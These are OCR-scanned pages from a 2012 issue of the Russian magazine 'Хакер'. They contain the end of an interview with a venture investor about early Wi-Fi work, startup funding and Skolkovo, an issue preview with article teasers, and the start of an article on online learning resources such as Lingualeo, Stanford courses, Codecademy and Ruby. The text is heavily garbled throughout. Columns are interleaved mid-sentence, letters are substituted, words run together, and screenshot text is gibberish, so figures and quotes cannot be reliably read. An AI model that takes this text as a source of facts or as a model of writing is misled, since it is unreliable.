ификацию и говорят: « Е сть протокол
Когда мы делали первый
VPN,
интернета
еще толком не было , браузер появился позже .
ной России все это уже было не нужно.
802.11,
Я очень люблю молодых nредnринима телей , которые говорят совершенно новые и порой непонятные вещи ... Но главное, чтобы они говорили на понятно м языке
...
Всесуперкомпаниисоздавалисьлюдь
Сервер, установленный в нашей компании
<<Элвис+>>, был в nервой полусотне [если не
ми в возрасте от
в числе первых нескольких десятков) веб
статистику потерянных компаний и компаний,
20 до 30 лет.
Н о если брать
который сейчас находится в разработке, а вы
серверов в мире. В этой эйфории мы ползли
которые выстрелили для венчурного капи
можете свар г анить РСМС I А-карточку?>>. Ну, я
за Sun'oм, который « п рисылал н ам девять тонн
талиста, то, на п ротив, полу ч ается, что нужно
и собрал команду ...
оборудования>>. Мы начали строить мейл
вкладывать в людей, которым уже
серверы- это направление потом выродилось
:). У
в компанию <<Эл вис Телеком>>. К примеру,
доводят до логического конца то, что созда
мы делали факс-серверы- у
ют. И пусть на них не заработать
Сам nротокол
802.11
мы , конечно, не изо
брели . Этим занимается lпterпet Eпgiпeeriпg
Task Force.
Мы, конечно, писали какие-то
до п олнения . Считать нас родителями
Wi-Fi
не
правильно, но первые рабочие образы сделали мы. В общем, были пионерами. Мы побили Motoгola, военных, и много
Microsoft такой
появился только где -то в конце 90-х годов. Мы пионерили во многих этих вещах . И сейчас вспоминаешь и думаешь: <<Вот ты хо
на
5-,
40-50
лет
них есть опыт и они, по крайней мере,
1000%,
как
или на чем-то там, но ты nолучишь
10-кратный возврат инвестиций.
Должен быть баланс между риском
дил по таким кладезям идей, и если бы кто-то
вложения денег в очень молодые головы и в
кого еще. Была интрига: ведь Suп раздал
мог правильно вложить бизнес-науку ... >>. Было
состоявшихся предпринимателей [так назы
конкуре н тные предложения нескольким фир
множество инноваций, но мы не знали, как ими
ваемых
мам. И вот мы, какие-тонепонятные русские,
распоряжаться. Д ля меня бизнес тогда был
имелинеуспешный бизнес и пытаются вести
привозим работающий образец. Все в шоке
п ростой : что -то сделать, продать, заработать
успешный, либо уже сделали успешный и те
и в трансе . Suп принимает решение, ч т о в нас
деньги.
перь хотят создать еще лучше. У после д них,
надо инвестировать. Для них это была во
repeated eпtrepreneurs), которые либо
У нас было много собственных идей ,
обще первая в истории ком п ании и н вестиция
но для нас было важно знать , « ч т о проис
в кого-либо.
ходит на кухне ». Интернет не был сильно
ХАКЕР
026
www.epidemz.net
04 / 159/2012
Интервью с венчурным инвестором
по меньшей мере, есть жила пре одолеть все
и там уже существую т двадцать компаний по
ная, способная и самокритичная команда.
болевые точки, удары, и они дойдут до конца,
добного рода ... Было бы странно поверить, что
А если они на что-то не способны, то должны
они все это уже проходили. А молодой человек
все будет хорошо. Особенно когда антрепренер
четко открыться и сказать: у нас нет пони
даже с супереветлой идеей может сломаться,
впервые делает компанию, имеет только идею,
мания в такой-то области, или, например,
или его вообще пенесет в десяток других идей,
и даже прототипа как такового у него еще нет
поэтому есть неуверенность в этом деле.
Увы, это не наша стадия.
В фонде
Almaz 2 мы
...
маркетинг. Д олжны признавать: да, у нас есть хороший человек, но мы хотели бы другого, вот
планируем вложиться
где-то в сорок компаний очень ранней стадии,
нет в команде человека, который понимает
КА К ПРИХОДИТЬ К ИНВЕСТОРУ ?
с такими-то параметрами.
Важно, чтобы люди понимали, в какой
когда они еще требуют небольших денег.
Есть такая nроблема, что люди пытаются
Но мы будем это делать вместе с акселерато
прийти прямо ко мне. Но лучше, когда они по
рынок они играют. Нуж но понимать свое место
рами, либо с какими-то инкубаторами. Кто-то
падают в систему и наш процесс. Когда пишут
в рынке, кто ваш реальный конкурент. Когда
другой будет «нянчить>> всех этих людей,
напрямую мне, я могу что-то случайно про
пишут в конкурентах
которые будут эванить по ночам и за давать
пустить, не прочитать- сыпется оче нь много.
курент, даже у
вопросы. Нас не хватит на них . Но мы сможем
Начинаются обиды. Предприниматель же счи
есть всего четыре компании, которые движут
подобрать их на следующей стадии, когда они
тает, что то, что у него сделано- это лучше
миропонимание:
уже немного оперятс я и смогут двинуться на
всего и неповторимо, и в мире такого больше
и Amazoп. Все остальные пытаются под
следующий этап . Наш фонд старается не участвовать в опе
ративном управлении компаний, в которые
Google ... Ну, он у всех кон Microsoft и IBM. Сегодня вообще Apple, Google, Facebook
нет. А если я не уделяю этому внимания, значит
строиться, в том числе и
я идиот, или зажравшийся ... человек .
найти, как и где сканкурировать с этой новой
Правильно nрийти к венчурному инвесто
Microsoft . Пытают ся
волной и остаться на вершине. Народ ленится посмотреть , что, вообще
инвестировали. Да , приходится влиять на
ру- это сначала сходить на его сайт и посмо
него. Иногда. Но забирать эту пальму пер
треть, что именно он хочет, что рассчитывает
венства у антрепренера- самоубийство,
увидеть. Как правило, мы публикуем такие
компаний, у которых есть деньги. И нужно
и мы стараемся этого никогда не делать .
требования .
сравниться с ними с точки зрения своих ре
то, в области есть куча проинвестированных
сурсов, людей. Понять, как выиграть у них эту игру. П онять, как двигаться дальше, как будут использоваться деньги, зачем вообще нужны деньги.
СЧИТАТЬ НАС РОДИТЕЛЯМИ
Важно пони мать : венчурный фонд- это
WI-FI
НЕПРАВИЛЬНО,
НО ПЕРВЫЕ РАБОЧИЕ ОБРАЗЦЫ СДЕЛАЛИ ИМЕННО МЫ.
сервисная компания. Это не есть компания, которая ведет тебя к успеху. Это всего-навсего
сервисная компания, которая помогает тебе туда прийти. Поэтому инициатива всегда должна находиться в руках СЕО, предпринима
теля !или антрепренера, как мы чаще говорим! и так далее.
Компания для nредnринимателя- ребе нок. Самон-неумелый родитель . А мы эдакие опытные няни . С этой точки зрения,
если мы будем навязывать ему, что делать, это будет неправильно. Он должен обращаться Во всем венчурном мире ты лучше работа
к нам и говорить : <<Вот у меня ребенок захны
ешь с nроектами, которые приходят по какой
кал, что делать? Какие бывают варианты, что
серьезная завязана- это требует очень
торекомендации,отчеловека,которомуты
мне нужно сделать, чтобы он успокоился? Или
много денег. Мы все-такинебольшие фонды,
доверяешь. Когда тебе говорят: «Сащ посмо
«Вот он хочет заниматься какими-то другими
и рассчитываем вложить lв «Алмазе>>, по
три, вроде бы интересно>>, то в первую очередь
игрушками, делать что-то другое. Что в таком
крайней мере ! за время жиэни семь, макси
ты, конечно, смотришь на эти проекты .
случае предпринять? Дать ему возможность
В некоторые ниши мы не вкладываем
ся. Например, в
e-commerce,
где логистика
мум пятнадцать миллионов в команду. Этого
Я не люблю бизнес-планов. Их никто
заниматься другими игрушками?>>. Вот здесь
явно мало для построения такого бизнеса как
не любит. Это в каком-то смысле устаре в
венчурный капиталист очень полезен: он мо
e-commerce
ший формат. Нет, конечно, бизнес-план был
жет прийти, помочь и многое сделать.
и уверен н ости, что эта компания
взлетит и куда-то двинется.
нужен когда-то, когда не было возможности
Часто венчурные капиталисты выступают
запомнить и проверить все, что тебе говори
в роли такого
большие риски, но они измеримы в реальных
ли . Сейчас все это можно в два счета сделать
выстроить команду, заменить, подрастить
деньгах, которые мы можем дать. Даже если
в презентации на пятнадцать слайдов и все
ее. Но все антрепренеры разные. Бывают
компании требуется больше чем пятнадцать
факты прикрыть линкамина отчеты, справки,
и такие, кто считает, что раз их компания
миллионов, с каким-то партнером ты можешь
аналитику и так далее. Хорошо, когда прихо
растет, приносит прибыль !хоть маленькую!,
это сделать.
дит презентация и к ней существуют сопут
значит, все - они г ерои, они уже могут жить не
ствующие материалы: ты можешь почитать,
по средствам.
Нам ближе софтверные компании. У них
У нас есть четкое требование: мы хотим видеть, что это миллиардный рынок . При
HR
или хэдхантера , помогают
проанализировать и сказать: <<да, вот анализ
П РО МОЛОД ЫЕ ПРО ЕКТЫ
чина проста: мы должны бы т ь уверены, что
по конкуренции с делан правильно>> или
у компании есть возможность маневрировать.
<<анализ рынка и позиционирования сделан
Еще несколько лет назад мы смеялись над
Если компания врывается на только откры
неверно>>.
тем, что есть такие чемпионы всех конкурсов,
вающийся рынок !даже если этот рынок очень
Очень важно, когда человек хорошо nред
которые с одним и тем же nроектом ходят
интересен в перспективе, но его размер со
ставляет, что он умеет и что нет. Ведь важнее
по всем тусовкам и везде его продвигают. Их
ставляет всего порядка двадцати миллионов!,
всего понять, что к тебе пришла правиль-
было считанное количество. На сегодняшний
ХАКЕР
027
04/159/2012
www.epidemz.net
·coVER STORY который занимается наnравлением Softwaгe
Defined
Netwoгking. Ведь проблема номер
один больших компаний и тел екома- уде день я бы так не сказал. Существует достаточ
определенного размера и дальше роста у них
шевить все затраты на сети и ЦОДы за счет
но много интересных проектов, интересных
нет. Они не могут вырваться из этой ниши, пото
виртуализации слоя сети . Это большое
уже с точки зрения совершенства представ
му что у них нет базы знаний, они не знают, что
направление, модное и популярное. Я с трудом
ления.
дальше существует в индустрии, что они могли
затаскиваю его в Сколково, чтобы построить
бы решать. И это только одна из проблем.
исследования совместно со Стэнфордом . Но я
Есть nроблема- многие идеи мелкие . Они нишевые и нацелены только на Россию. Люди
Когда !Т-nредnриниматели быстро до
рассчитываю, что из этого проекта может
не осознают рынка глобального. А на россий
биваются очень больших усnехов, а nотом
появиться новая плеяда мыслящих ученых,
ском рынке только складывается культура
начинают nросаживаться . Это другая про
могут родиться прорывные компании.
покупки компаний . Я всегда привожу в пример
блема. При чина одна- они зарабатывают
Google . Статистику за 2009 или 2010 год, когда они купили 42 компании. Из них только две были объемом 400 миллионов и миллиард. Все остальные сорок были ... ну, средний чек составлял 25 миллионов. Значит, кого-то они
много денег сами, владеют практически
ково должно сыграть большую роль именно
всей компанией и зарабатывают от
в накоплении и формировании базы знаний
в следующий этап у них нет. Им сложно- они
отраслевые НИИ, сейчас их нет. То есть, где
купили за пятьдесят, кого-то- за один. Услов
хотят, но, с другой стороны, им придется рас
должна база знаний формироваться- непо
но . Или за
В России чек будет ниже в
1 до 10
У нас не формируется база знаний. Скол
миллионов долларов в год. Им ничего не
в индустрии. Быть может, даже большую, чем
надо- у них жизнь удалась. Амбиций роста
оно играет сейчас . В старые времена были
ставаться с этим полным владением того, что
нятно. У нас есть неплохие сетевые инженеры,
раза. Условно, средний чек сделки в России
они делают. Есть, к примеру, такая компания
есть не плохие институты, которые готовят
должен составля ть
JetBгaiпs из Пит ера, вот она запросто может
неплохих сетевых инженеров, просто они
на
3,
10-30.
25
миллионов поделить
ну пусть это будет
ний чек
1О
2-3
8-10
миллионов. Сред
миллионов, но если я хочу иметь
стать миллиардной компанией. Но их, видимо,
не имеют индустриального пони мания, куда им
удовлетворяют те
дернуться и двинуться. Если же создать базу
40-60
миллионов долларов
соответствующий возврат, я должен вложить
оборота, с которыми они работают. И владель
знаний, они будут видеть: вот оно - лежит.
более
цы как бы игнорируют всех, им не интересны
Скажем, к примеру, если я напишу некий
деньги никаких венчурных капиталистов.
софт, чтобы роутер быстрее работал [именно
Но приятная штука в том, что в России таких
софтовый роутерl, то вот- я могу создать
компаний довольно много.
и компанию на основании моих исследований.
300
30%
компании . Я должен вложить тысяч
и получить обратно свои
это будет нормально . Но за
3 миллиона, вот 300 тысяч, вроде
бы, и компанию не построишь. Или надо на строить такие компании, которые бы уклады
Вот такие я вижу возможности.
вались в эту экономику . Это та часть осозна
llk•l•ik•l:lel
ния, которая еще приходит. И формируется
Если я увижу в Сколково « расnил бабла» , я
nравил. Сейчас же там для компаний, которые
венчурный рынок. Н о количество компаний
сразу наnишу заявление об уходе . Думаю, та к
получают гранты, устанавливают правила:
выросло, хотя есть вот такие проблемы .
поступят и другие люди из совета директоров.
например, средняя зар плата должна быть
Эрик Шмидт, любые другие иностранцы ... Если
только такая-то. Или говорят, что нельзя пере
удивить мир (новые Paгallels, Касnерские,
они это увидят, они уйдут. Может ли в Скол ко во
распределять бюджеты. Но ведь бывает и так ,
Акронисыl не много . Я всегда объясняю, что
появиться « распил>>? В строительстве, в схе
что компания очень динамичная. Может быть,
причина в том, что, во-первых, у нас нет таких
мах строительства, наверное, что-то может
компания заявила, что бюджет надо было
индустриальных лидеров, чтобы вот э ти «темы»
про изойти. Но чтобы он появился именно
потратить на маркетинг, но теперь его нужно
можно было ловить и пони мать, где существуют
в области фондирования компаний ... вряд ли.
потратить на покупку пяти дополнительных
«дырки», которые можно залатать . Во-вторых,
По крайне мере, там явно сегодня не нужно да
компьютеров. А им говорят- нет, нельзя, надо
у нас нет исследований . В старые времена
вать никому никаких о тк атов, чтобы получить
тратить на маркетинг! Вот эта совковость, ко
были отраслевые НИИ, сейчас их нет или
гранты или статус участника. Все это делается
торая сидит в Счетной палате , в Минфине, она
совсем мало. То есть, непонятно, где должна
очень по-честному.
и заставляет Скол ко во жить по правилам, и это
Проектов
«go global», которые
могут
формироватьсябаза знаний. Поэтомукомпа
Сколково должно быть исключением из
Грустно , но хорошие комnании не хотят
можетпогубитьСколково .
нии в основном создаются людьми, которые
брать гранты в С колково-с ними куча возни.
начинают писать софт: смотрят, что где-то есть
Я говорил со многими, и они считают, что у них
дженералисты, которые имеют nонимание
какие-то проблемы, и что-то там решают. Часто
нет времени на все эти отчеты. Но пока эти
в технологиях, имеют достуn к эксnертизе.
решают они очень нишевые задачи. А вот рас
самые отчеты не сделаешь- следующий этап
Как венчурный капиталист, я ведь не экс перт
ширение бизнеса зачастую затруднительно.
гранта не получишь . Значит, возникают кассо
во всем. Если мне нужна какая-то специальная
Есть куча людей, которые на таком нишевам
вые разрывы. Вот компании и считают, что все
экспертиза, я нахожу человека на мировом
софте зарабатывают деньги
это нафиг не нужно, один геморрой.
[Famatech и их
RAdmiп, скажем, и можно назвать еще много
интересных компаний), но они вырастают до
Сейчас я затаскиваю туда исследова тельский nро е кт nод названием
OpenFiow,
Сколково нужны такие эксnерты
рынке, которому я могу доверять: я знаю, что
это именно тот человек, который может под сказать мне, хорошо это или плохо. Н о я все же отвечаю за результат и своей репутацией. В Сколково нужно создавать атмосферу nростоты, nрозрачности , доверия и реnута
цианной ответственности. Когда не просто
ТРИ ПОЖЕЛАНИЯ ПРЕДПРИНИМАТЕЛЯМ
существует какая-то компании, а за компанией
строит конкретный антрепренер, чья репута ция какими-то вещами либо поднимается, либо
1
БЫТЬ НЕМНОЖКО
CRAZY
2
УЧИТЬСЯ НА ОШИБКАХ
3
СТАВИТЬ АМБИЦИ
опускается. Вот в таком случае, думаю, такая
ОЗНЫЕ ЗАДАЧИ
атмосфера сложится. Так живет Кремниевая
Стремиться оставаться
И делать их как можно
И так их отмерять, чтобы
долина. Чтобы создать это, нам нужно, чтобы
немножко ненормальным,
больше. Но никогда
даже если ты достигнешь
было кипение, круговорот открытости и всего
даже если это непонятно
не повторять!
20-30%
окружающим.
от задуманного,
то мог бы собой гордиться.
остального. Я хочу верить , что получится. Иначе будет трудно запустить инновационную индустрию в Ро ссии.
::I:
ХАКЕР
028
www.epidemz.net
04/159/2012
Preview
30 страниц на одно й
поло се .
Ти з ер н екото ры х с тате й .
PCZONE УНИВЕРОНЛАЙН ЗО
Осв(Jить новый для себя язык програм мирования сего дн я просто как никогда.
Чтобы получить минимальный базис, с помощью которого можно начать
разработку простей ших приложений, теперьнеобязательнодажечитать
умные книжки. Для многихтехнологий появились очень доступные и понятные
обучалки,которыевинтерактивном режиме позволяют пощупать новуюдля
себя технологию без лишней при л юдии и зан удства. А для фундаментальных
предметов ведущие ВУЗы мира разра батываютонлайн-курсы, позволяю щ ие прослушать лекции, ранее доступ н ы е
только студентам за бешенные деньг и.
взлом
PCZONE
DuckDuckGo 36
РАСШАРИТЬ ПРИЛОЖЕНИЕ !
«GOOGLE СЛЕДИТЗА ТОБОЙ , МЫ-НЕТ »
М ожнолипере н естиокноприложенияиз
Googleyжe да вн о м ейнстрим. Гики
Wlпdоws - с и с те м ы в Liпux и п ро д о л жить
предпочитаю т др угой пoиcкoвик
NET п р иложени й ,
с ним рабо т у? М ожно, есл и ус т а н овить на
DuckDuckGo, ко т орый заботится об
wе Ь - р азрабочик и , мо гутс та ть причиной
обоих ком п ью т ерах yтилитyWinSwitch.
анонимности п о л ьзователей.
вз л ома. Р азбираемся на при м ере.
взлом
ТЕМНАЯ СТ ОРОНАТРАССИРОВКИ
56
Механизмы отла д ки и трассировкиАS Р.
кот о ры ми пользуютс я
MALWARE
взлом -Maii.Ru Агента ПОЛУЧАЕМ ДОСТУП К ИСТОРИИ ПЕРЕПИСКИ И КОНТАКТАМ В ПОПУЛЯРНОМ МЕССЕНДЖЕРЕ
..
-~
ВЗЛОМ MAIL.RUAГEHTA
60
Эта статья н е о вз л оме замечательного мессенджера. Это история атом, как с
нуля был отреверсен формат, в кото р ом хранятся сооб щения пользователя.
Х АКЕР
•
С АНТИВИРУСОМ ПОКОНЧЕНО Последняя статья из серии о внутреннем
устройстве анивирусов. В этот раз мы рассмотрим мониторинг сетевой актив ности и песочницы.
04/159/2012
•
НЕИЗВЕСТНАЯУГРОЗА Испытываемэвристику аверовна самых новых вирусах, которые еще не
появились в базах п опулярных анти в и русн ы х решений.
029
www.epidemz.net
PCZONE
Каnитан Улитка
МОЖНО ЛИ СТАТЬ СПЕЦИАЛИСТОМ В НЕ ВЫХОДЯ ИЗ ДОМА? ДА! На одни х только статьях журнала « Хакер » далеко не уедешь. Это я тебе точно говорю . Если х очешь стать настоящим специалистом в области IT, необходимо учиться
и обязательно получить фундаментальные знания о предмете .
К счастью, сегодня для этого возможностей больше, ч е м когда -либо . В Сети не только доступно множество учебников бесплатно , но и стремительно развиваются совершенно новые , прогрессивные способы обучения . И особенно э то
касается нашей -IТ'шной- специальности .
ц
IT,
ель данного материала - по казать, насколько просто сегодня можно
обучаться самостоятельно . Бы-
стро осваивать новые технологии и языки
программирования. При этом делать это не в напряг и получать настоящее удовольствие
от обучения. Я н е претендую на полноту кар тины, и эта статья, само собой, не является
сборником всех проектов, которые могут по мочь тебе в самообразовании. Но я постарал ся собрать некоторые особенно интересные сервисы, которые были интересны лично мне.
Уверен, они пригодятся и тебе.
ХАКЕР
030
www.epidemz.net
04 / 159/2012
Универ онлайн
Изучаем английский язык
· · .
Я с ерьезно рискую, начиная этот материал со
интересные возможности. Большинство авто
Короче говоря, изучение языка нужно добавить
с лов «английский язык>> . У многих людей с ним
ритетных конференций проходит на английском.
в свой личный список дел в качестве одного
с ложности, и ирония в том, что чем серьезнее
В самых круnных сообществах сnециалистов
из приоритетных пункта в. Сказать по правде,
проблема, тем больше люди противятся его
nринят английский язык. Известные ученые ве
абсолютное большинство ресурсов, о которых я
изучению, приДумывая отговорки и оправдания .
дут блоги и пишут статьи на английском языке .
буду говорить далее, требуют хотя бы минималь
Как бы там ни было, могу тебе сказать с пол-
На английском языке говорят в Силиконовой до
ного знания английского. Однако для первого
ной уверенностью: по-настоящему успешный
лине. И на нем же изъясняются программисты из
nроекта из нашего обзора иностранный как раз
!Т-специалист если и может обойтись без
Индии, которых стало так много, что спрятаться
английского языка, то упускает при этом многие
от них у тебя не получится при всем желании
LINGUALEO
:1.
ческих минивыступлений с TED.coml, лекций из западных университетов [в том числе по
Есть простое правило: чтобы лучше и уверен
иностранному языку! и так далее. Все это
нее подтягиваться на турнике, нужно больше
разбито на категории по тематике, сложности
и чаще подтягиваться на турнике. Просто ин
и рейтингу у пользователей. Но главное за
тенсивнее заниматься. Так же и с английским:
ключается в том, как именно сервис позволяет
чтобы хорошо понимать на слух английскую
этот контент потреблять. Рядом с видео выво
речь, не вслушиваясь в каждое слово в по
дится полная расшифровка речи, поэтому ты
пытке разобрать хоть что-то, нужно больше
всегда можешь прочитать непонятный на слух
слушать этой самой речи. Можно начать с про
фрагмент. Встречаешь не известное слово?
~
.... ~--·"-"
1
себя контент и быстро разбираешься с непо
смотра какого-нибудь сериала, подключив
Один клик,- и
для уверенности оригинальные субтитры, но ...
перевод и заносит это слово в твой личный
нятными местами. Для себя я не вижу лучшего
по сравнению с тем, что представляет сервис
словарь, чтобы дальше с помощью самых раз
способа, во-первых, nополнять словарный
Lingualeo
тут же показывает
не нужен- напротив, он направлен на то, чтобы
ты быстро прокачал свои знания «ИнЯз'а» .
Lingualeo.гu,- это прошлый век. В его базе
ных упражнений ты мог запомнить его и начать
запас, а во-вторых, привыкнуть к английской
уже собрано огромное количество сериалов,
использовать в нужном контексте. Никаких
речи. Чтобы «Отрабатывать» те слова, которые
всевозможных фильмов, заnисей различных
тебе больше ковыряний с субтитрами и сло
nросто встречаются в интернете, я давно себе
семинаров и выступлений !например, темати-
варей, -ты просто смотришь интересный для
установил специальный аддон для браузера .
Онпайн-универы Найдется немало людей, которые захотят по
что всему можно научиться самостоятельно,
[например, в iTunesl, но и вообще формиро
спорить о том, необходимолиИТ-специалисту
-было бы желание. Последнее стало еще
вать культуру преподавания университетских
высшее образование. Правы те, кто говорит, что
проще после того как ведущие западные вузы
nредметов онлайн. Хотел бы я сейчас отметить
фундаментальные знания остро необходимы.
с зашкаливающей стоимостью обучения начали
подобные инициативы со стороны российских
Но можно согласиться и с теми, кто утверждает,
не только выкладывать видео своих лекций
вузов, но здесь сказать пока нечего.
У ЧЕБНЫЕ К У РСЫ ОТ СТЭНФОРДА
ственный интеллект» ! a1.:cla~.coml. <<Введение
Криптография ! cs101-cla!>_s.oгa l;
в базы данных» [ db:c l ass.oгa l . Каждый из курсов
Помимо непосредственно ИТ'шных предметов,
Университет Стэнфорда, расположенный в Кали
состоит из лекций, проверочных работ и финаль
есть пара курсов по предпринимательству
форнии , известен по всему миру. Фактически это
ного экзамена. В случае успешного завершения
[в области высоких технологий). Я пока успел по
кузница кадровдлятехнологических комnаний
обучения студент получает сертификат в виде
слушать курс по машинному обучению и получил
Силиконовой долины, многие из которых рас
РОF-файла, заверенного цифровой подписью
огромное удовольствие. Курс построен таким
положены в Пало Альта- в том же городе, что
преподавателя.Экспериментоказалсяуспеш
образом , чтобы быть понятным практически
и сам университет. Попасть в С тэнфорд-мечта
ным , и в начале года Стэнфорд анонсировал
каждому, хотя, безусловно, знания в области
для многих молодых людей, которые жаждут
сразу дюжину новых курсов , в том числе:
дискретной математики и математического ана
Информационная безопасность ! secuгitv Q.ass.oгa l;
лиза будут здесь очень полезны. Надо сказать,
читаешь про С тз н форд, тем больше радуешься тому факту, что осенью университет запустил
Проектированиеианализалгоритмов
субтитрами на случай, если что-то сложно разо
проектбесплатныхонлайн-курсов.Изначально
[~ecur ity_class..osal; Теория и гр !cs i 01.:clas~.o.rgl; Информатика !cs iU1:class.orql;
брать на слух. Как правило, язык очень простой,
сделать карьеру в области ИТ. Чем больше
всем желающим nредлагалось пройти три курса :
«Машинное обучение» ! ml.:.:l~~.nro l. <<Искус-
MITX ОТ МАССАЧУСЕТСКОГО ТЕХНОЛОГИЧЕСКОГО ИНСТИТУТА
лась информация о первом курсе, который будет
что видео любого из курсов сопровождается
позтому все понятно даже со средним уровнем
английского .
да вателей-профессор Джеральд Сассмен,
проходить с помощью этой системы- <<6.002х:
который создал язык
Схематехника и электроника». Обучение начнется
одного из самых лучших учебников по програм
весной и потребует примерно десять часов в не
Scheme
и является автором
вестном западном вузе. Тоттоже пошел по стопам
делю. Предмет непростой, поэтому допускаются
мированию- <<Stгuctuгe and lnteгpretation of Computer Pгograms». В скором будущем обеща
С тэнфорда и в начале года анонсировал раз
только студенты, обладающие необходимыми
ется появление и других предметов. Уверен, что
работку
знаниями по электричеству, магнетизму и диффе
подобное по зубам и российским учебным заведе
ренциальномуисчислению . Средитрехпрепо-
ниям, которые просто обязаны не отставать.
Ты наверняка слышал и о
MIT- не
MITx -технологической
менее из
платформы для
онлайн-образования. И вот уже в феврале появи-
Х АКЕР
031
04 / 159/2012
www.epidemz.net
PCZONE ~ iq"!.et:Y
JavaScript Главное, о чем я хочу сегодня рассказать
сколько особенно модных языков програм
взаимодействие с пользователем. Особен
конкретный язык программирования. Тут
мирования: Python, Ruby !п люс Ruby on Rail sl и, конечно же, Java5cгipt IHTML51. С послед
Java5cгipt совершенноневозможные вещи:
очень заметна закономерность: чем актив
него и начнем.
взять хотя бы проект виртуальной машины,
нее язык развивается и набирает популяр
Ни одно современное веб-приложение не
на которой вполне себе успешно запускается
ность, тем больше появляется инструментов
обходится се г од ня без ударной дозы кода
Linux l be l laгd . o г g/jsl i n ux l . Но этот случай мы
для его изучения. Для nримера я взял не-
на J5, на которо м полностью реализовано
рассматривать не будем
э т о серви.сы, позволяющие изучить вполне
CODECADEMY
:1.
Се крет у спеха в изящн ос ти процесса обу чения. С помощью специального интерфейса
www.cod ec ademy.com
ст у дентам сразу же начинают рассказывать
о базовых особенностях языка и его с ин т ак
Простой вопрос: какой самый проверенный
сиса, и, что важнее всего, предлагают сразу
способ выучить новый язык программирова
проверить знания в действии, набрав код
ния? Взять умную книгу и начать ее читать.
в специальной консоли. Все это происходит
Этот подход никогда не устареет. Так было
в браузере, без необходимо с ти уста навливать
двадцать лет назад, так есть и сейчас . Однако
что-либо на своем компьютере. Шаг за шагом
сложно представить, что к
ные гики умудряются имплементировать на
21
веку не приду
_,.,..,. WeH
donellь.\ong
HndOLrtЬytyp\l'lg)'OUr.-
isyouriiCIIII!?
Clfte.-~cllq)\etethetnstf"Vtti.ons).
Gl"eCtjoЬINoll,iet'sdosomemoth.You~doiiiOththroughprogriiiiiiiHIQI
Totolw\ot•2•2,jvsttype 2•2
...... -·-··-.. " ........
можно быстро разобраться, что к чему, и по
11
нять все базовые принципы Java5cгipt. Чтобы
тем более- обучения программированию.
еще больше стимулировать студентов к обуче
: ::1:•! '= 0 ~:-·:~lloк,..;ooooelt.\
Codecademy- э т о стартап, позиционирующий
нию, по мере nрохождения курса им выдаются
себя как школу разработчика. За семь десят
награды.
Прое кт быстро получил финансирование
For~~~e,thot'dЬe " Ryan· . tangth
_,
мали более прогрессивных методов обучения,
два часа после открытия он собрал более
i.nquote:s
onctendi.ngi.twf.th. l tniJth .Pr-tsfoet'ltercfterwords(dothisf~nowor~
1
..... ••• loLooll ··•••! "".. - .......... , , -,.,
nлатформе Codecademy. Проект выбрал
двухсот тысяч lвдумайся в цифру!! начинаю
и очень скоро обещает значительное попол
модель UGC IUseг-geneгated contentl и сейчас
щих программ истов, предложив им пройти
нени е учебных курсов. Уже сейчас доступна
активно приелекает к n ополнению контента
инт еракти вный курс Java5cгipt.
система для создания своих курсов на готовой
сообщество .
ВЫУЧИТЬ
JQUERY
ЗА ТРИДЦАТЬ ДНЕЙ
портал
Nettuts+, известный своими каче
ственными обучающими статьями, разработал специальный курс . Курс разбит на тридцать
leaгnj query. tutsplus . com
уроков-скринкастов по пятнадцать минут
каждый, что позволяет день за днем посте Неотделимой частью Java5cгip t постепенно
пенно брать библиотеку на вооружение. Как
стала библиотека jQueгy, упрощающая работу
ни крути, а пятнадцать минут можно найти
с НТМL-документом, обработку событий,
всегда. Да и формат обучения очень приятный:
создание анимации и реализацию AJAX.
лично для меня нет ничего более понятного,
Фактически jQueгy во многом изменил подход
чем непосредственная демонстрация кодинга
к прогрвммированию на Java5cгipt. Разобрать
с комментариями по ходу дела. Для тех, кто
ся с библио т екой в принципе неслож но. Но
только начинает изучать J5, есть и видеокурс
чтобы сделать это еще более безболезненно,
этого же автора I Ьi t .l y/AqK4sO I.
ПЕРВЫЙ ПОЛЕТ НА JQUERY
рых включает в себя обучающий скринкаст
Learn jQuery in зо Days (It's free.) Each d~y you' ll Ье sent 11
f~e
video \esson.
Лt
theend of the
month, you'U Ье аЫе to confidently use jQU('ty ln your projects, withouthelp.
и интерактивные упражнения по программи
codesc hool .co m/co urses/j que г у-а i г-fi rs t-f 1igh
рованию, реализованные прямо в браузере. За
прохождение заданий начисляются очки !на Если спросить, кто снимает скринкасты
пример, 350 за решенную задачку! . Е сл и где-то
эталонного качества, то среди победите-
возникла трудность, можно попросить под
лей совершенно точно будет онлайн-школа
сказку, но в этом случае не избежать штраф
программирования c<>de school . Это очень
ных баллов. На первом уровне предлагается
профессиональный nроект, предлагающий
nройти азы Java5cript, на втором- селекторы,
как платные, так и бесплатные курсы для
на третьем- (55-атрибуты, на четвертом
специалистов различного уровня. Курс <<jOue гy
манипулирование с НТМL-элементами и DOM,
Аiг : Fiгst Flight» долгое время был платным, но
на пятом- работа с событиями. Чтобы пройти
с недавнего времени открыт всем желающим.
курс, необходимо выполнить пятьд есят пять
Он состоит из пяти уровней, каждый из кота-
простых и не очень у nражн ений.
ХАКЕР
032
www.epidemz.net
04 / 159/201 2
Универ онлайн
Ruby и Ruby оп Rails
.{; RAILS
Если ты читал в прошлом номере инт ервью
все . И ч ем бо льш е растет спрос, тем больше
Впр оче м, знание языка пригодится, даже ес ли
с Аленой Владимир ской, кото рая по прав у счи
ста н овятся зарплаты. Е сли у тебя есть опыт
ты не собираешься работать профессиональ
тается ведущи-м хедхантером Р унета, то уже
программирова ния , и ты хочешь переква
ным разработчиком.
знаешь, насколько вост р ебов анными сейчас
лифицироваться на более востребованное
экспертов по и нформационн ой безопасности :
на пр авление, то
к примеру, известный фреймворк для хакера
являются прогр амм и сты на
Ruby оп Rails.
За
Ruby
в связке с
Ruby
оп
Rails
грамот ными с n е циали ста ми , готовыми быстро
-совершенно точно очень неплохой вариант.
поднимат ь растущие веб-проекты, г о няют ся
И выучить его сейчас можно довольно быстро.
RUBYMONK
Ruby популярен
и среди
Metasploit !и в т ом чис ле все е го модули! на писаны им енно на Ruby.
предлагаются более сложные упраж нения.
Совершенно улетно реали зована проверка
выполненных заданий !код решения, есте
rubymonk.com
___
ственно, надо набирать прямо в браузере,
TIWIRw:/yF'r1rr'erl8a!·•"':8f8Ctlve
Проект представляет собой интерактивную
а редактор даже поддержива ет подеветку
ЬOOkthalt\e'Piyaule&lnRuoy
книгу, состоящую из пятид есяти упражнений,
си нтаксиса!. Д ля каждого упражнения за даны
~~----
позволяющих быстро пройтись по основам
контрольные точки, по которым проверяет-
Ruby.
Тебе говорят: << Ма ссив из элеме нт ов
